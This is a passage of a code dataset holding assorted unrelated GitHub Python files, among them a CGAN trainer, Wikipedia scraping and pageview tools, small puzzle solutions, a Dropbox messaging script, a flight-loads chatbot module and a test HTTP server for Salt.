self.config.save_epoch_interval == 0:\r\n model_cgan = \"Epoch{}dcgan_loss{}discriminator_loss{}acc{}.h5\".format(ep, np.average(cgan_losses),\r\n np.average(d_losses,0)[0],np.average(d_losses,0)[1])\r\n self.cgan.save(os.path.join(model_path, model_cgan))\r\n save_dir = os.path.join(train_result_path, str(\"Epoch{}\".format(ep)))\r\n if not os.path.exists(save_dir):\r\n os.mkdir(save_dir)\r\n self.save_image(int(ep), save_dir)\r\n '''\r\n if int(ep) in self.config.generate_image_interval:\r\n save_dir = os.path.join(train_result_path,str(\"Epoch{}\".format(ep)))\r\n if not os.path.exists(save_dir):\r\n os.mkdir(save_dir)\r\n self.save_image(ep,save_dir)\r\n '''\r\n plt.plot(np.arange(epoch),cgan_losses,'b-','cgan-loss')\r\n plt.plot(np.arange(epoch), d_losses[0], 'b-', 'd-loss')\r\n plt.grid(True)\r\n plt.legend(locs=\"best\")\r\n plt.xlabel(\"Epoch\")\r\n plt.ylabel(\"Loss\")\r\n plt.savefig(os.path.join(train_result_path,\"loss.png\"))\r\n\r\n def save_image(self, epoch,save_path):\r\n \"\"\"\r\n 这是保存生成图片的函数\r\n :param epoch:周期数\r\n :param save_path: 图片保存地址\r\n :return:\r\n \"\"\"\r\n rows, cols = 10, 10\r\n\r\n fig, axs = plt.subplots(rows, cols)\r\n for i in range(rows):\r\n label = np.array([i]*rows).astype(np.int32).reshape(-1,1)\r\n noise = np.random.normal(0, 1, (cols, 100))\r\n images = self.generator_model.predict([noise,label])\r\n images = 127.5*images+127.5\r\n cnt = 0\r\n for j in range(cols):\r\n #img_path = os.path.join(save_path, str(cnt) + \".png\")\r\n #cv2.imwrite(img_path, images[cnt])\r\n #axs[i, j].imshow(image.astype(np.int32)[:,:,0])\r\n axs[i, j].imshow(images[cnt,:, :, 0].astype(np.int32), cmap='gray')\r\n axs[i, j].axis('off')\r\n cnt += 1\r\n fig.savefig(os.path.join(save_path, \"mnist-{}.png\".format(epoch)), dpi=600)\r\n plt.close()\r\n\r\n def generate_image(self,label):\r\n \"\"\"\r\n 这是伪造一张图片的函数\r\n :param label:标签\r\n \"\"\"\r\n noise = truncnorm.rvs(-1, 1, size=(1, self.config.generator_noise_input_dim))\r\n label = np.array([label]).T\r\n image = self.generator_model.predict([noise,label])[0]\r\n image = 127.5*(image+1)\r\n return image\r\n","repo_name":"Daipuwei/CGAN-mnist","sub_path":"CGAN/CGAN.py","file_name":"CGAN.py","file_ext":"py","file_size_in_byte":12023,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"78"} +{"seq_id":"11347274841","text":"import wikipedia as wp\nfrom wikidata.client import Client\nimport re\nfrom bs4 import BeautifulSoup\nimport requests\n\ndef get_wikidata_desc(q_number):\n\n client = Client()\n try:\n entity = client.get(q_number, load=True)\n _result = entity.description\n except:\n _result = None\n\n return _result\n\n\ndef get_page_data(page_title):\n\n try:\n page = wp.page(page_title)\n\n url = page.url\n content = requests.get(url).content\n soup = BeautifulSoup(content, 'lxml')\n try:\n q_number = soup.find('li', {'id': 't-wikibase'}).a['href'].rsplit('/')[-1]\n except:\n q_number = None\n\n return page, q_number\n\n except:\n pass\n\ndef get_authors(category_list):\n \"\"\"\n Return a list of all Wikipedia pages within a list of categories\n \"\"\"\n\n _list = []\n for i in category_list:\n _list.extend(wp.search(\"incategory:\\\"{}\\\"\".format(i), results=1000))\n _list = list(set(_list)) # only return unique values\n print(\"Found {} authors including {}...\".format(len(_list), \", \".join(_list[:7])))\n return _list\n\n\ndef strip_links(html):\n \"\"\"\n Strip all links and related text out of an html string\n \"\"\"\n\n list_nolinks = re.split('', html)\n list_nolinks = [x for x in list_nolinks if 'href=' not in x]\n str_nolinks = \"\".join(list_nolinks)\n return str_nolinks\n\n\ndef find_matches(html, check_list):\n \"\"\"\n Return a list of potential authorlinks that should be added\n \"\"\"\n\n _matched_list = []\n for i in check_list:\n try:\n _index = html.index(i)\n _matched_list.append(i)\n except:\n continue\n return _matched_list\n\n\ndef check_page_authorlinks(page_object, wp_authors):\n \"\"\"\n Returns potential missing author links\n for a given WP page title using a list of authors\n \"\"\"\n\n no_links = strip_links(page_object.html())\n list_matches = find_matches(no_links, wp_authors)\n\n title = page_object.title\n url = page_object.url\n match_count = len(list_matches)\n missing_authors = \", \".join(list_matches)\n\n if match_count > 0:\n return [title, url, match_count, missing_authors]\n else:\n return None\n\n\ndef crawl_child_authorlinks(seed_page_object, wp_authors):\n \"\"\"\n check pages for missing authorlinks including the seed page\n and all linked pages n levels_deep\n \"\"\"\n\n _result_list = []\n _links = sorted(list(set(seed_page_object.links)))\n print(\"Checking {} child pages.\".format(len(_links)))\n for i in _links:\n i_object, q_num = get_page_data(i)\n try:\n _missing = check_page_authorlinks(i_object, wp_authors)\n _result_list.append(_missing)\n except:\n pass\n\n return _result_list\n\ndef crawl_child_descriptions(seed_page_object):\n \"\"\"\n start with a seed page and crawl all child pages to fetch\n their descriptions on wikidata, which is used as a short description\n in mobile search results on wikipedia\n \"\"\"\n\n _result_list = []\n _links = sorted(list(set(seed_page_object.links)))\n print(\"Checking {} child pages.\".format(len(_links)))\n for i in _links:\n try:\n i_object, q_num = get_page_data(i)\n wikidata_desc = get_wikidata_desc(q_num)\n wikidata_page = \"https://www.wikidata.org/wiki/{}\".format(q_num)\n print(\"{}: {}\".format(i_object.title, wikidata_desc))\n _result_list.append([i_object.title, i_object.url, wikidata_desc, wikidata_page])\n except:\n pass\n \n return _result_list","repo_name":"joshnankivel/wikikit","sub_path":"utils/wp.py","file_name":"wp.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38421196658","text":"\"\"\"\r\nGiven an integer n, return the number of trailing zeroes in n!.\r\n\r\nFollow up: Could you write a solution that works in logarithmic time complexity?\r\n\r\nInput: n = 3\r\nOutput: 0\r\nExplanation: 3! = 6, no trailing zero.\r\n\r\nExample 2:\r\n\r\nInput: n = 5\r\nOutput: 1\r\nExplanation: 5! = 120, one trailing zero.\r\n\r\n\"\"\"\r\n\r\n# fives = n / 5 + n / 25 + 。。。\r\n\r\ndef trailingZeroes(self, n: int) -> int:\r\n zero_count = 0\r\n while n > 0:\r\n n //= 5\r\n zero_count += n\r\n return zero_count","repo_name":"ruozhengu/Leetcode","sub_path":"factorialTrailingZeros.py","file_name":"factorialTrailingZeros.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9488958279","text":"import sqlite3\n\n# function to create a connection to the database\ndef create_connection(database):\n conn = None\n try:\n conn = sqlite3.connect(database)\n except sqlite3.Error as error:\n print(error)\n return conn\n","repo_name":"jonhogan/Subway_Project","sub_path":"database/database_functions/create_connection.py","file_name":"create_connection.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40306160491","text":"import xml.etree.cElementTree as ET\nfrom xml.dom import minidom\nfrom datetime import datetime\n\n_url = \"https://wandhoven.ddns.net/RPG/denanu-dnd/\" # <-- Your website domain.\ndt = datetime.now().strftime(\"%Y-%m-%d\") # <-- Get current date and time.\nsitemapFile = \"public/sitemap.xml\"\n\ndef prettify(elem):\n \"\"\"Return a pretty-printed XML string for the Element.\n \"\"\"\n rough_string = ET.tostring(elem, 'utf-8')\n reparsed = minidom.parseString(rough_string)\n return reparsed.toprettyxml(indent=\" \")\n\ndef generateURL(root, url, priority=\"1.0\", updatefreq=\"weakly\"):\n doc = ET.SubElement(root, \"url\")\n ET.SubElement(doc, \"loc\").text = _url + url\n ET.SubElement(doc, \"lastmod\").text = dt\n ET.SubElement(doc, \"changefreq\").text = updatefreq\n ET.SubElement(doc, \"priority\").text = priority\n\n\ndef generate_sitemap():\n root = ET.Element(\"urlset\")\n \n generateURL(root, \"monsters\")\n\n with open(sitemapFile, \"w\") as file:\n file.write(prettify(root))\n\ngenerate_sitemap()\n\n","repo_name":"JulianWww/denanu-dnd","sub_path":"buildSiteMap.py","file_name":"buildSiteMap.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17329759456","text":"import urllib2\nimport os\n\ndef _get_appdata_path():\n import ctypes\n from ctypes import wintypes, windll\n CSIDL_APPDATA = 26\n _SHGetFolderPath = windll.shell32.SHGetFolderPathW\n _SHGetFolderPath.argtypes = [wintypes.HWND,\n ctypes.c_int,\n wintypes.HANDLE,\n wintypes.DWORD,\n wintypes.LPCWSTR]\n path_buf = wintypes.create_unicode_buffer(wintypes.MAX_PATH)\n result = _SHGetFolderPath(0, CSIDL_APPDATA, 0, 0, path_buf)\n return path_buf.value\n\ndef dropbox_home():\n from platform import system\n import base64\n import os.path\n _system = system()\n if _system in ('Windows', 'cli'):\n host_db_path = os.path.join(_get_appdata_path(),\n 'Dropbox',\n 'host.db')\n elif _system in ('Linux', 'Darwin'):\n host_db_path = os.path.expanduser('~'\n '/.dropbox'\n '/host.db')\n else:\n raise RuntimeError('Unknown system={}'\n .format(_system))\n if not os.path.exists(host_db_path):\n raise RuntimeError(\"Config path={} doesn't exists\"\n .format(p))\n with open(host_db_path, 'r') as f:\n data = f.read().split()\n return base64.b64decode(data[1])\n\ndropbox_folder = os.path.join(dropbox_home(),\"Public\",\"dmp\")\nif not os.path.isdir(dropbox_folder):\n os.makedirs(dropbox_folder)\n\ndef send(messagenum, message, dropbox_id):\n ''' Send message with the given message num to the given id '''\n with open(os.path.join(dropbox_folder,\"dmp{}\".format(dropbox_id)),\"wb\") as dmpfile:\n dmpfile.write(\"{}\\n{}\".format(messagenum,message))\n return True\n\ndef receive(receive_dropbox_id,send_dropbox_id):\n while True:\n try:\n data = urllib2.urlopen(\"https://dl.dropboxusercontent.com/u/{}/dmp/dmp{}\".format(send_dropbox_id,receive_dropbox_id)).read()\n messagenum = int(data.split(\"\\n\",1)[0])\n message = data.split(\"\\n\",1)[1]\n break\n except Exception as e:\n if e == KeyboardInterrupt:\n raise e\n return messagenum, message","repo_name":"HuFlungDu/Dropbox-Messaging-Protocol","sub_path":"dmp.py","file_name":"dmp.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11713620433","text":"from tkinter import *\nimport string\nfrom functools import partial\nimport random\n\nmain = Tk()\nmain.geometry(\"5000x400\")\nmain.title('Morse')\n\ndef symbole(l, mot):\n m=mot.get()+l\n mot.set(m)\ndef effacer(mot):\n mot.set(\"\")\n\ndef trad():\n res=inpt.get()\n res = res.split()\n m=\"\"\n print(morses)\n print(res)\n for i in range(0,len(res)):\n for c in range(0,26):\n if res[i]==morses[c]:\n m+=reallettres[c]\n break\n mot.set(m)\n \n \nmot = StringVar()\ntexte1 = Label(main, text=\"Morse\").pack()\ntextmot = Label(main, textvariable =mot).pack()\ninpt = Entry(main, width=1000)\ninpt.pack()\nphoto =[]\nbouton =[]\nreallettres=string.ascii_lowercase\nmorses = [ '.-', '-...', '-.-.','-..', '.','..-.', '--.', '....', '..','.---','-.-', '.-..', '--', '-.', '---', '.--.', '--.-', '.-.', '...', '-', '..-', '...-','.--', '-..-', '-.--', '--..']\nlettres =random.sample(reallettres,len(reallettres))\ny = 75\nx=75\nfor i in range(0,26):\n path =\"Morse/\"+lettres[i]+\".png\"\n photo.append(PhotoImage(file = r\"\"+path))\n x +=220\n if i%7==0:\n y+=75\n x=75\n l= lettres[i]\n b= Button(main, text=\"Symbole\"+str(i), image=photo[i], command= partial(symbole,l, mot)).place(x=x,y=y)\n bouton.append(b)\nmot.set(\"\")\nboutonDechiffrage = Button(main, text=\"Traduire\", command= lambda: trad()).pack()\nboutonDechiffrage = Button(main, text=\"Effacer\", command= lambda: effacer(mot)).pack()\n\nmain.mainloop()\n","repo_name":"feaders/forge_logiciel","sub_path":"morse - Copie.py","file_name":"morse - Copie.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74237772410","text":"import datetime\ndef most_frequent_days(year):\n first_day = datetime.date(year, 1, 1)\n last_day = datetime.date(year, 12, 31)\n\n # counter\n counter = [0] * 7 #[monday_count, tuesday_count, ...]\n\n # count first week\n for dow in range(first_day.weekday(), 7):\n counter[dow] += 1\n\n # count last week\n for dow in range(0, last_day.weekday() + 1):\n counter[dow] += 1\n\n max_count = max(counter)\n names = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']\n\n ret = []\n for dow, count in enumerate(counter):\n if count == max_count:\n ret.append(names[dow])\n\n return ret\n\nif __name__ == '__main__':\n # These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert most_frequent_days(2399) == ['Friday'], \"1st example\"\n assert most_frequent_days(1152) == ['Tuesday', 'Wednesday'], \"2nd example\"\n assert most_frequent_days(56) == ['Saturday', 'Sunday'], \"3rd example\"\n assert most_frequent_days(2909) == ['Tuesday'], \"4th example\"\n","repo_name":"civic/checkio","sub_path":"the-most-frequent-weekdays.py","file_name":"the-most-frequent-weekdays.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42319030941","text":"from sklearn import datasets, linear_model, model_selection, metrics\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\n\npd.set_option('display.max_rows', None)\npd.set_option('display.width', None)\npd.set_option('display.max_colwidth', None)\n\npri = datasets.load_boston()\n\n# doesn't have any meaning. Just handling for proficiency.\n# data_df = pd.DataFrame(data=pri.data, columns=pri.feature_names)\n# print(data_df['CHAS'].value_counts())\n# print(data_df['RAD'].value_counts(sort=False))\n# targ_df = pd.DataFrame(data=pri.target, columns=['MEDV'])\n# df = pd.concat([data_df, targ_df], axis=1)\n# print(df.describe())\n\ndata = pri.data\nlabel = pri.target\n\n# print(data.shape)\n# print(label.shape)\nlabel = label.reshape(-1, 1)\n\n# use only one feature\n# All datas always should be a matrix shape at every model.\nx = data[:, 12:13] # LSTAT\n# same as above\n# x = data[:, 12]\n# x = x.reshape(-1, 1)\ny = label\n\ntrain_x, test_x, train_y, test_y = model_selection.train_test_split(x, y, test_size=0.3, random_state=42) # random_state : set random seed (usually use 42)\n# print(train_x.shape) # 354, 1\n# print(train_y.shape)\n# print(test_x.shape) # 152, 1\n# print(test_y.shape)\n\nmodel = linear_model.LinearRegression()\n\n# train\nmodel.fit(train_x, train_y)\n\n# print(model.coef_) # weight\n# print(model.intercept_) # bias\n\n# predict\nres = model.predict(test_x)\n# print(res)\n# print(train_y)\n\n# check difference\n# for i in range(len(res)):\n# print(f\"{res[i]} {test_y[i]}\")\n\n# print(np.sqrt(np.mean((res - test_y) ** 2)))\n# print(np.sqrt(metrics.mean_squared_error(test_y, res))) # same as above\n\n# visualization\nplt.figure(figsize=(10, 10))\nplt.scatter(test_x, test_y, color='black')\nplt.scatter(train_x, train_y, color=\"red\", s=1)\nplt.plot(test_x, res, color='blue', linewidth=3)\nplt.xlabel('LSTAT')\nplt.ylabel('price')\nplt.show()","repo_name":"Park-SeungWoo/kakao-ai-study","sub_path":"ML/linear_reg/linear_reg_boston_housing.py","file_name":"linear_reg_boston_housing.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"5857579273","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\nCall as:\n\n MatchPageviews.py prefix pagetitles.txt XXwiki-NNNNNNNN-page.sql.gz pagecounts+++-totals.bz2 pagecounts+++-totals.bz2, ...\n\nINPUT:\n\nprefix denotes the name used for the appropriate wiki project, e.g. 'en.z' for en.wikipedia (note this is different from the normal dumps, which just use 'en')\n'The project is one of b (wikibooks), k (wiktionary), n (wikinews), o (wikivoyage), q (wikiquote), s (wikisource), v (wikiversity), z (wikipedia).'\n\npagetitles.txt gives the page titles (spaces are substituted for _, and cgi-escapes done). Any text before the last tab is taken as a row name, to output\nany number of pagecounts files can be provided, and the page visits in each file added to the output. In particular, you might want to pass in a list of\npagetitles as generated by OTT_2_Wikidata.py (see example below)\n\nXXwiki-NNNNNNNN-page.sql.gz is the SQL database dump, from http://dumps.wikimedia.org/ (listed as Base per-page data (id, title, old restrictions, etc).)\nThis should match the wiki denoted by the 'prefix' value. So for instance if you put prefix = 'en.z', you should use an sql page dump of the enlish wikipedia\nsuch as https://dumps.wikimedia.org/enwiki/latest/enwiki-latest-page.sql.gz\n\nThe pagecount files per month are probably the most sensible, and can be obtained from http://dumps.wikimedia.org/other/pagecounts-ez/merged/. The per-month files\nend in totals.bz2\n\nOUTPUT:\n\nyou might want to take a quick look at the top rated taxa. For example, if a single pageview file is given then you can look at the 3rd column\n\nsort -k 3,3nr -t$'\\t' popularity.txt | less\n\nor for something more complicated, use R\n\n> dat <- read.delim(\"popularity.txt\")\n> viewcols <- grep('bz2',names(dat))\n> dat$trmeanMonthlyPageviews <- apply(dat[,viewcols],1,function(x) mean(sort(x, TRUE)[-1:-2])) #trim off the top 2 months, to kill spikes\n> dat[order(dat$trmeanMonthlyPageviews, decreasing=TRUE),][1:40,-viewcols]\n> dat[order(dat$page_size, decreasing=TRUE),][1:40,-viewcols]\n> dat[order(dat$trmeanMonthlyPageviews*dat$page_size, decreasing=TRUE),][1:40,-viewcols]\n\nEXAMPLES:\n\nOneZoomTouch/server_scripts/OTT_2_Wikidata.py ott/taxonomy.tsv wikidumps/wikidata-20151005-all.json.gz enwiki > map_file.txt\ncut -f 1,4 map_file.txt | sort -n | uniq | MatchPageSizeAndViews.py en.z - wikidumps/enwiki-latest-page.sql.gz wikidumps/pagecounts-*totals.bz2 > OneZoomTouch/popularity.txt\n\n'''\n\nimport sys\nimport csv\nimport re\nimport resource\nimport fileinput\nimport collections\nimport urllib.parse\n\ndef warn(*objs):\n print(*objs, file=sys.stderr)\n\ndef memory_usage_resource():\n import resource\n rusage_denom = 1024.\n if sys.platform == 'darwin':\n # ... it seems that in OSX the output is different units ...\n rusage_denom = rusage_denom * rusage_denom\n mem = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / rusage_denom\n return mem\n\ndef sensible_sum(l):\n '''Treat None as NA, e.g. if l==[] or l == [None, None] return None'''\n l = [x for x in l if x is not None]\n if len(l):\n return sum(l)\n else:\n return None\n\ndef strNone(x):\n return str(x) if x is not None else ''\n\nif len(sys.argv) < 4:\n sys.exit('Provide the name of a wiki project (e.g. en.z, or en.b) as the first argument, the name of a titles file as the second, and pagecounts files as further args')\n\nlinetitles={}\n\n#we collect the original lines in the tsv file in each element of 'lines', the page size data in each element of 'pagesize' and \n# the vector of view stats in arrays stored in each element of 'pageviews'\nlines = []\npagesize = []\npageviews = []\ntitle_col=-1 #the column in the tsv file which contains the wiki title (default = last column)\n\npageview_files = collections.OrderedDict()\nfor fn in sys.argv[4:]:\n if fn not in pageview_files: #make unique\n pageview_files[fn]=len(pageview_files)\ntry:\n title_file = fileinput.input(sys.argv[2])\nexcept IOError as e:\n sys.exit(\"I/O error reading list of page titles ({0}): {1}\".format(e.errno, e.strerror))\n \nfor line in title_file:\n if (title_file.filelineno() % 500000 == 0):\n warn(\"{} entries read from title file: mem usage {} Mb\".format(title_file.filelineno(), memory_usage_resource()))\n line = line.rstrip('\\r\\n')\n lines.append(line)\n if title_file.isfirstline():\n \n pagesize.append(\"page_size\")\n pageviews.append(list(pageview_files.keys())) #headers\n else:\n wikititle = line.rsplit(\"\\t\",1)[title_col] #assume 2nd item in each row is the page title\n pagesize.append(None)\n if wikititle != \"\":\n wikititle = wikititle.replace(\" \",\"_\")\n linetitles[wikititle] = len(lines)-1\n pageviews.append([None] * len(pageview_files))\n else:\n pageviews.append([])\nwarn(\"Done: {} entries read.\".format(len(lines)))\n\ntry:\n import gzip\n import csv #use csv reader as it copes well e.g. with escaped SQL quotes in fields etc.\n pagelen_file = csv.reader(gzip.open(\"/Volumes/SDdisk/PageCounts/enwiki-latest-page.sql.gz\", 'rt', encoding='utf-8'), quotechar='\\'',doublequote=True)\nexcept IOError as e:\n sys.exit(\"I/O error reading sql dump of page info ({0}): {1}\".format(e.errno, e.strerror))\n#the column numbers for each datum are specified in the SQL file, and hardcoded here.\npage_table_namespace_column = 2\npage_table_title_column = 3\npage_table_pagelen_column = 12\nmatch_line = \"INSERT INTO `page` VALUES\" #pageviews have project name (ascii) followed by space, followed by uri-escaped title, followed by space, followed by integer\nfor fields in filter(lambda x: False if len(x)==0 else x[0].startswith(match_line), pagelen_file):\n if (pagelen_file.line_num % 500 == 0):\n warn(\"{} lines ({} pages) read from page info SQL file: mem usage {} Mb\".format(pagelen_file.line_num,pagelen_file.line_num*1000, memory_usage_resource()))\n field_num=0\n for f in fields:\n try:\n if f.lstrip()[0]==\"(\":\n field_num=0\n namespace = None\n title = None\n except IndexError:\n pass\n field_num+=1;\n if field_num== page_table_namespace_column:\n namespace = f\n if field_num== page_table_title_column:\n title = f\n elif field_num==page_table_pagelen_column and namespace == '0':\n try:\n pagesize[linetitles[title]] = f\n except LookupError:\n pass\n\n#page titles in the pageview dumps are uri-escaped, so we need to change the keys to escaped ones, to check against pageviews\nfor t in linetitles:\n linetitles[urllib.parse.quote(t)] = linetitles.pop(t)\n\n\nmatch_project = (sys.argv[1]+\" \").encode() #pageviews have project name (ascii) followed by space, followed by uri-escaped title, followed by space, followed by integer\ntry:\n fp = fileinput.input(pageview_files,openhook=fileinput.hook_compressed)\nexcept IOError as e:\n sys.exit(\"I/O error reading pageview dumps ({0}): {1}\".format(e.errno, e.strerror))\n\nold_filename = ''\nfilenum = -1\nproblem_lines = {x:[] for x in pageview_files} #there are apparently some errors in the unicode dumps\nfor line in fp:\n if (fp.filelineno() % 1000000 == 0):\n warn(\"{} entries read from pagecount file {} ({}): mem usage {} Mb\".format(fp.filelineno(), pageview_files[fp.filename()], fp.filename(), memory_usage_resource()))\n if line.startswith(match_project):\n try:\n fields = line.decode('UTF-8').rstrip('\\r\\n').split(\" \")\n pageviews[linetitles[fields[1]]][pageview_files[fp.filename()]] = int(fields[2])\n except LookupError:\n pass\n except UnicodeDecodeError:\n problem_lines[fp.filename()].append(fp.filelineno())\nfor fn,prob_lines in problem_lines.items():\n if len(prob_lines):\n warn(\"Problem decoding certain lines in {}. The following lines have been ignored: {}.\".format(fn, \", \".join([str(x) for x in prob_lines])))\n \n \nfirstline = 1\nfor line, size, vals in zip(lines, pagesize, pageviews):\n if len(pageview_files)>1:\n if firstline:\n print(\"\\t\".join([line] + [size] + vals + ['total_pageviews']))\n firstline = 0\n else:\n print(\"\\t\".join([line] + [strNone(size)] + list(map(strNone,vals)) + [strNone(sensible_sum(vals))]))\n else:\n print(\"\\t\".join([line] + [strNone(size)] + list(map(strNone,vals))))","repo_name":"OneZoom/OZtree","sub_path":"OZprivate/ServerScripts/TaxonMappingAndPopularity/Popularity/old/MatchPageSizeAndViews.py","file_name":"MatchPageSizeAndViews.py","file_ext":"py","file_size_in_byte":8464,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"78"} +{"seq_id":"74524279930","text":"import requests\nimport datetime\nfrom pprint import pprint\nfrom modules.config import flight_loads_endpoint, cert_path\n\n\ndef make_flight_loads_req(dept_date, flight_number, access_code, airline_code):\n \"\"\"\n Function that makes the request to api.caribbean-airlines to get the flight loads\n :param dept_date: Departure Date\n :param flight_number: Flight Number\n :param access_code: Access Code to access endpoint\n :param airline_code: \"BW\" for Caribbean Airlines\n :return:\n \"\"\"\n if \"BW\" in flight_number:\n flight_number = flight_number.replace(\"BW\", \"\").strip()\n\n data = {\n \"flight_number\": flight_number,\n \"dept_date\": dept_date,\n \"access_code\": access_code,\n \"airline_code\": airline_code,\n }\n resp = requests.post(flight_loads_endpoint, json=data, verify=cert_path)\n pprint(resp.json())\n return resp.json()\n\n\ndef get_flight_loads(df_request):\n \"\"\"\n Handles the request from DialogFlow for getting flight loads\n :param df_request: The DialogFlow request\n :return: Text string representing the flight load response\n \"\"\"\n try:\n response_list = []\n date = df_request[\"queryResult\"][\"parameters\"][\"date\"]\n date_formatted = (\n datetime.datetime.strptime(date, \"%Y-%m-%dT%H:%M:%S%z\")\n .date()\n .strftime(\"%d%m%y\")\n )\n access_code = datetime.datetime.now().strftime(\"%A\").lower()\n flight_num = df_request[\"queryResult\"][\"parameters\"][\"flight-number\"]\n flight_loads = make_flight_loads_req(\n date_formatted, flight_num, access_code, \"BW\"\n )\n if \"status\" in flight_loads and flight_loads[\"status\"] is True:\n load_list = flight_loads[\"loads\"]\n for each_flight in load_list:\n response_str = (\n f\"*{each_flight['origin']} -> {each_flight['destination']}*\\n\"\n )\n for cabins, values in each_flight[\"cabins\"].items():\n # print(cabins, values)\n if \"J\" in cabins:\n response_str += \"*Business Class*\\n\"\n response_str += f\"Available: {values['available']}\\n\"\n response_str += f\"Booked: {values['booked']}\\n\"\n response_str += f\"Booked Staff: {values['booked_staff']}\\n\"\n response_str += f\"Capacity: {values['capacity']}\\n\\n\"\n if \"Y\" in cabins:\n response_str += \"*Economy Class*\\n\"\n response_str += f\"Available: {values['available']}\\n\"\n response_str += f\"Booked: {values['booked']}\\n\"\n response_str += f\"Booked Staff: {values['booked_staff']}\\n\"\n response_str += f\"Capacity: {values['capacity']}\\n\"\n response_list.append(response_str)\n return response_list\n else:\n if \"message\" in flight_loads:\n return [\"Sorry. I got this error: \" + flight_loads[\"message\"]]\n return [\"Error handling request.\"]\n except Exception as err:\n import traceback\n\n print(traceback.print_exc())\n print(err)\n\n\ndef format_datetime(date_string):\n return datetime.datetime.strptime(date_string, \"%d%m%yT%H%M\").strftime(\n \"%a %d %b %I:%M%p\"\n )\n\n\ndef get_flight_loads_command(date, flight_num):\n response_list = []\n try:\n access_code = datetime.datetime.now().strftime(\"%A\").lower()\n date = datetime.datetime.strptime(date, \"%Y%m%d\").date().strftime(\"%d%m%y\")\n flight_loads = make_flight_loads_req(date, flight_num, access_code, \"BW\")\n if \"status\" in flight_loads and flight_loads[\"status\"] is True:\n load_list = flight_loads[\"loads\"]\n for each_flight in load_list:\n response_str = f\"{'*'*40}\\n*{each_flight['origin']} -> {each_flight['destination']}*\\n\"\n response_str += (\n f\"*Departure: {format_datetime(each_flight['departure_time'])}*\\n\"\n )\n response_str += (\n f\"*Arrival: {format_datetime(each_flight['arrival_time'])}*\\n\"\n )\n for cabins, values in each_flight[\"cabins\"].items():\n # print(cabins, values)\n if \"J\" in cabins:\n response_str += \"*Business Class*\\n\"\n response_str += f\"Available: {values['available']}\\n\"\n response_str += f\"Booked: {values['booked']}\\n\"\n response_str += f\"Booked Staff: {values['booked_staff']}\\n\"\n response_str += f\"Capacity: {values['capacity']}\\n\\n\"\n if \"Y\" in cabins:\n response_str += \"*Economy Class*\\n\"\n response_str += f\"Available: {values['available']}\\n\"\n response_str += f\"Booked: {values['booked']}\\n\"\n response_str += f\"Booked Staff: {values['booked_staff']}\\n\"\n response_str += f\"Capacity: {values['capacity']}\\n\"\n response_str += f\"{'*'*40}\\n\"\n response_list.append(response_str)\n return \"\\n\\n\".join(response_list)\n else:\n if \"message\" in flight_loads:\n return \"Sorry. I got this error: \" + flight_loads[\"message\"]\n return \"Error handling request.\"\n except Exception as err:\n import traceback\n\n print(traceback.print_exc())\n print(err)\n\n\nif __name__ == \"__main__\":\n test_req = {\n \"queryResult\": {\n \"parameters\": {\n \"date\": \"2018-12-31T12:00:00-05:00\",\n \"flight-number\": \"BW600\",\n }\n }\n }\n\n pprint(get_flight_loads(df_request=test_req))\n","repo_name":"Randy-Ram/Ana","sub_path":"modules/cal/flight_loads.py","file_name":"flight_loads.py","file_ext":"py","file_size_in_byte":5869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12852036564","text":"import functools\nimport hashlib\nimport http.server\nimport multiprocessing\nimport os\nimport random\nimport shutil\nimport socket\nimport sys\nfrom contextlib import closing\n\nimport pytest\n\nimport salt.utils.files\n\n\nclass TestRequestHandler(http.server.SimpleHTTPRequestHandler):\n \"\"\"\n Modified request handler class\n \"\"\"\n\n def __init__(self, *args, directory=None, **kwargs):\n if directory is None:\n directory = os.getcwd()\n self.directory = directory\n if sys.version_info.minor < 7:\n super().__init__(*args, **kwargs)\n else:\n super().__init__(*args, directory=directory, **kwargs)\n\n def do_GET(self):\n \"\"\"\n GET request handling\n \"\"\"\n none_match = self.headers.get(\"If-None-Match\")\n status_code = 200\n try:\n # Retrieve the local file from the web root to serve to clients\n with salt.utils.files.fopen(\n os.path.join(self.directory, self.path[1:]), \"rb\"\n ) as reqfp:\n return_data = reqfp.read()\n # We're using this checksum as the etag to show file changes\n checksum = hashlib.sha256(return_data).hexdigest()\n if none_match == checksum:\n # Status code 304 Not Modified is returned if the file is unchanged\n status_code = 304\n except: # pylint: disable=bare-except\n # Something went wrong. We didn't find the requested file\n status_code = 404\n return_data = None\n checksum = None\n\n self.send_response(status_code)\n\n # Return the Etag header if we have the checksum\n if checksum:\n # IMPORTANT: This introduces randomness into the tests. The Etag header key\n # will be converted to lowercase in the code... but if someone breaks that,\n # it'll rear it's head here as random failures that are hard to reproduce.\n # Any alternatives seem overly complex. So... don't break the case insensitivity\n # in the code.\n possible_etags = [\"Etag\", \"ETag\", \"etag\", \"ETAG\"]\n self.send_header(random.choice(possible_etags), checksum)\n self.end_headers()\n\n # Return file content\n if return_data:\n self.wfile.write(return_data)\n\n\ndef serve(port=8000, 